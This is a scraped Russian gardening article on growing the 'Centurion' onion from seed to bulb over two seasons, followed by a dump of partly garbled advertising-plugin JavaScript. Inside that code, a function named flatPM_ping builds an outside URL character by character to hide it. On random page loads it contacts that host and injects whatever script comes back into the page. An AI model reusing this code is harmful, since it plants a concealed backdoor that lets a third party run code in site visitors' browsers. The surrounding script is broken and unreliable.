  4. В конце марта – начале апреля участок боронуют для выравнивания поверхности почвы.
  5. До посева семян сорта «Центурион» по необходимости проводят 2-3 прополки с целью угнетения сорной растительности.

Посев севка

Лучшим сроком посева семян лука является конец апреля – начало мая. Посев проводится следующим образом:

  1. Семена перебирают и сортируют.
  2. Перед посевом семена замачивают в воде на 24 часа. В качестве регулятора роста можно в воду с семенами добавить препарат «Вымпел» в дозе 10 мл. на 5 л. воды. Этот препарат позитивно влияет на дальнейшее развитие растений и увеличивает полевую всхожесть на 4-7%.
  3. Семена вылаживают на влажную материю и сверху накрывают пленкой.
  4. Приготавливают посевные борозды глубиной 3-4 см. Расстояние между бороздами должно быть 20-22 см.
  5. На дно борозды равномерно вносят 20-25 г. перепревшего навоза и 10 г. простого суперфосфата на 1 м. посевной строки.
  6. Семена равномерно размещают в борозде из расчета 3 г. семян на 1 м2.
  7. Сверху высеянные семена присыпают рыхлой землей и немного уплотняют.

Уход за растениями

  1. Прополка. Для быстрого и дружного роста растений лука «Центурион» в первый год выращивания нужно посевы данного сорта содержать в чистом от сорняков виде. Поэтому в течении всего периода выращивания нужно проводить прополку растений лука по мере появления сорной растительности. Прополку следует проводить на глубину 2-3 см. не повреждая луковицы.
  2. Поливы. Для хорошего роста и развития севка нужно осуществлять его полив не реже одного раза в неделю. На 1 м2 нужно расходовать 10-12 л. воды.
  3. Подкормки. Чтобы собрать качественный посадочный материал сорта «Центурион» нужно в начальный период развития растений осуществить подкормки по следующей схеме:
    а) Через две недели после появления всходов севка проводят подкормку растений аммиачной селитрой, путем равномерного разбрасывания данного удобрения по поверхности почвы нормой 20-25 г. на 1 м2. После этого нужно незамедлительно осуществить полив этого участка для растворения и впитывания в почву внесенного удобрения. Следует помнить, что при нахождении аммиачной селитры под солнечными лучами в течении 3-4 часов приводит к полной потере азота. В конечном итоге азот улетает в атмосферу, а на земле остается одна оболочка. Поэтому временной интервал между разбрасыванием удобрений и поливом должен быть минимальным.
    б) По прошествии двух недель после первой подкормки нужно провести опрыскивание растений жидкими удобрениями, содержащих в своем составе гуминовые кислоты. Такими удобрениями являются «Гумат калия» и «Вымпел». Норма внесения – 20 г. на 12 л. воды. Опрыскивают растения в вечернее время.

Уборка и доработка севка

Севок сорта «Центурион» начинают убирать при пожелтении и полегании ботвы. В среднем этот момент наступает через 85-90 дней после посева. После уборки севок подготавливают к хранению:

  • На поле собранный севок вылаживают лентами и просушивают под действием солнечного света в течении 10-12 дней.
  • Удаляют ботву и очищают от различного мусора.
  • Севок разделяют на три сорта согласно показателям диаметра и веса.

Урожайность севка вышеупомянутого сорта может достигать 10-15 т. с 1 га.
В зимний период севок хранится в специальных помещениях с оптимальным температурным режимом.

Технологические особенности луковиц сорта «Центурион» в течении второго года выращивания

Требования к выбору участка и обработке почвы во втором году выращивания практически идентичны требованиям первого года. Поэтому мы повторяться не будем, а перейдем сразу к подготовке севка к посадке.

Подготовка посадочного материала

  • Переборка севка с целью отбора не поврежденных и не загнивших экземпляров.
  • Отобранные луковички прогревают на улице под навесом или другим накрытием 3-4 дня.
  • Отбираются луковицы 1-3 см. в диаметре.
  • Обеззараживают севок путем погружения на 10 минут в раствор медного купороса (10 г. препарата на 10 л. воды).

Посадка севка

К посадке севка приступают, когда земля на глубине 8-10 см. прогреется до + 9 градусов Цельсия. Посадку севка проводят следующим образом:

  • Готовят посадочные борозды глубиной 6-8 см.
  • Расстояние между соседними бороздами должно составлять 10-12 см.
  • На 1 погонный метр посадочной борозды вносят 40-50 г. перепревшего навоза и 10 г. древесной золы.
  • В подготовленные борозды помещают севок с расстоянием друг от друга на 8-9 см.
  • Борозды присыпают землей и немного утрамбовывают.

Уход за растениями

  1. Прополка. Осуществляют на протяжении всего периода выращивания. Глубина обработки – 2-3 см. Основная задача прополки – угнетение и по возможности удаление сорной растительности с участка, где выращивается данный сорт.
  2. Поливы. Растения сорта «Центурион» хорошо реагируют на систематические поливы. Для данного сорта достаточно одного полива в неделю. На 1 м2 должно расходоваться не менее 10 л. воды.
  3. Подкормки. Нужно провести как минимум две подкормки:
    – Первая подкормка проводится через три недели после высадки севка. Для этого очень хорошо подходит аммиачная селитра, которая разбрасывается по поверхности почвы и сразу же поливается. Норма внесения удобрения составляет 20-25 г. на 1 м2.
    Вторую подкормку нужно осуществить через две недели. В то время лучше всего усваиваются растениями лука такие удобрения как «Энерген аква» и «Гумат калия». Для этого проводят опрыскивание растений раствором 20 мл. на 10 л. воды в вечернее время.
  4. Борьба с вредителями. Сорт «Центурион» может сильно повреждаться личинками луковой мухи. Особенно опасным периодом считается конец июня – начало июля. В это время вылупившиеся личинки проникают в средину листьев луковиц и очень сильно угнетают растения, приводя к замедлению их роста и значительному снижению урожая. Меры борьбы: При массовом лете взрослых особей на протяжении мая месяца нужно провести опрыскивание лука инсектицидами «Командор» и «БИ-58».

Уборка урожая

Сорт «Центурион» убирают в конце июля – начале августа. При полегании листьев луковицы аккуратно выдергиваются и слаживаются в кучи. Уборку нужно провести в сжатые сроки. Собранный урожай переносят, под какое либо накрытие, и розлаживают слоем не более 8-10 см. Через 2-3 дня у подсушенных таким образом луковиц срезают корни и привядшие листья. С 1 м2 можно получить 5-6 кг. прекрасных луковиц данного сорта.

Хранение урожая

Собранный урожай хранят в деревянных ящиках, корзинах и сетках. Температура воздуха в хранилище должна составлять –1 -3 градуса Цельсия. Относительная влажность воздуха 55-70%.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};